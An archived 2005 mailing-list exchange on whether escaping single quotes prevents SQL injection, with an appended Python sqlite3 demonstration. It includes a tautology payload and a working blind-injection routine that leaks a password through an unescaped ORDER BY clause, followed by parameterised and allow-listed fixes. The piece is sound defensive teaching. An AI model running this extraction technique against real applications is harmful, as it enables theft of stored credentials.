[thelist] Re: Avoiding SQL Injection

Joe Ngo chilijoe at gmail.com
Mon Mar 21 23:16:26 CST 2005


> a system of simply escaping single quotes when inserting data from your users
> is *not* sufficient for preventing every type of malicious attack against
> your application.

I am not disagreeing, but I am curious. Can you supply a single
example of when this is not enough? Prepared statements might make
writing the application program easier, but if an application escapes
all strings and checks the validity of numbers *every time* it builds
SQL statements, how could SQL injection still be possible? Escaping
strings should not be limited to user input, but should also cover
data coming from the database, which an attacker could sneak in.

On Tue, 22 Mar 2005 14:07:58 +1100, Ken Schaefer <Ken at adopenstatic.com> wrote:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> : From: thelist-bounces at lists.evolt.org [mailto:thelist-
> : bounces at lists.evolt.org] On Behalf Of Brooking, John
> : Subject: [thelist] Re: Avoiding SQL Injection
> : 
> : I do believe you may be right, because the fact that 
> : I'm storing it in a string column means that
> : a SQL attack string is going to have to close the quote 
> : that I opened in my code in order to get the rest of 
> : his nefarious scheme to parse correctly. So by definition, 
> : it has at least one single quote, so escaping all single
> : quotes will prevent any other potential special characters, 
> : such as semi-colons, from being evaluated as anything 
> : other than characters inside a string. I hadn't 
> : thought that through before!
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> I am preparing a response to Joshua's previous post. However, as I
> mentioned, a system of simply escaping single quotes when inserting data
> from your users is *not* sufficient for preventing every type of malicious
> attack against your application.
> 
> This is not a simple topic - advanced SQL Injection attacks are not trivial,
> and so presenting something concise that also sufficiently demonstrates the
> point isn't a quick-n-easy post for me (especially since it's not an area I
> deal with day-in and day-out, and so I don't have anything pre-canned I can
> send to the list).
> 
> Use prepared statements. JDBC has stuff for this. ADO has stuff for this.
> ADO.NET as well. I don't know what PHP uses to connect to mySQL, but
> magic_quotes and is_int are not sufficient safeguards against every type of
> attack if you are building SQL inline in your PHP code.
> 
> Cheers
> Ken
> 
> --
> www.adOpenStatic.com/cs/blogs/ken/
> -- 
> 
> 

-- 
Take back the web!
http://www.spreadfirefox.com
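An added example (not from the original thread, and not code by any of the posters) that makes Joe's question concrete. The thread is about PHP and MySQL; this uses Python's sqlite3 module against an in-memory database because it runs anywhere, and the table, rows, passwords and function names are constructed for the illustration. It shows both halves of the argument: doubling single quotes really is enough where the input lands inside a quoted string literal, and it is no defence at all where the input lands anywhere else in the statement, here a sort column taken from a request parameter. That position takes an identifier or expression, which is never quoted, so the payload contains no quote for the escaper to touch, and a number check does not apply either. The hardened functions use placeholders for values and an allow-list for identifiers, because placeholders cannot carry a column name.

```python
import sqlite3

# Constructed sample data for this illustration; not from the original thread.
ROWS = [
    ("alice", "alice@example.com", "s3cr3t"),
    ("bob", "bob@example.com", "hunter2"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def escape_quotes(s):
    """The defence under discussion in the thread: double every single quote."""
    return s.replace("'", "''")


def find_by_name_escaped(conn, name):
    # Input lands inside a quoted literal. Quote-doubling is enough here: the
    # attacker cannot close the quote, so everything stays string data.
    sql = "SELECT email FROM users WHERE name = '%s'" % escape_quotes(name)
    return [row[0] for row in conn.execute(sql)]


def list_emails_sorted_escaped(conn, order_by):
    # Input lands where an identifier or expression goes. Identifiers are not
    # quoted, so a payload needs no quote and escape_quotes() changes nothing.
    sql = "SELECT email FROM users ORDER BY %s" % escape_quotes(order_by)
    return [row[0] for row in conn.execute(sql)]


def password_char_is(conn, victim_email, pos, code):
    """Blind oracle via sort order: True iff victim's password has chr(code) at pos."""
    test = "unicode(substr(password, %d, 1)) = %d" % (pos, code)
    # Matching rows sort first; non-matching rows keep table order (rowid).
    asc = "CASE WHEN %s THEN 0 ELSE 1 END, rowid" % test
    # Matching rows sort last. If no row matches, every row ties and the rowid
    # tie-break gives the same order as `asc`, so a miss cannot look like a hit.
    desc = "CASE WHEN %s THEN 1 ELSE 0 END, rowid" % test
    return (list_emails_sorted_escaped(conn, asc)[0] == victim_email
            and list_emails_sorted_escaped(conn, desc)[0] != victim_email)


def leak_password(conn, victim_email, length):
    """Recover `length` characters of a password, one printable character at a time."""
    out = ""
    for pos in range(1, length + 1):
        for code in range(32, 127):
            if password_char_is(conn, victim_email, pos, code):
                out += chr(code)
                break
        else:
            out += "?"  # no printable character matched at this position
    return out


# Hardened versions: placeholders for values, an allow-list for identifiers.
ALLOWED_SORT_COLUMNS = ("name", "email")


def is_allowed_sort_column(column):
    return column in ALLOWED_SORT_COLUMNS


def find_by_name_safe(conn, name):
    # The driver sends the value separately from the statement text.
    sql = "SELECT email FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


def list_emails_sorted_safe(conn, order_by):
    # A placeholder cannot stand in for a column name, so the only safe
    # option is to accept nothing but known column names.
    if not is_allowed_sort_column(order_by):
        raise ValueError("unexpected sort column: %r" % order_by)
    sql = "SELECT email FROM users ORDER BY %s" % order_by
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    print(find_by_name_escaped(db, "x' OR '1'='1"))   # [] : escaping held
    print(leak_password(db, "alice@example.com", 6))  # s3cr3t : escaping irrelevant
```

The same reasoning applies to any other unquoted position an application might fill from input: a table name, a LIMIT count, a column in a SELECT list, or a bare number that the code forgot to validate. Quote escaping protects exactly one context, the inside of a string literal; parameterised queries remove the question for values, and what cannot be parameterised has to be allow-listed.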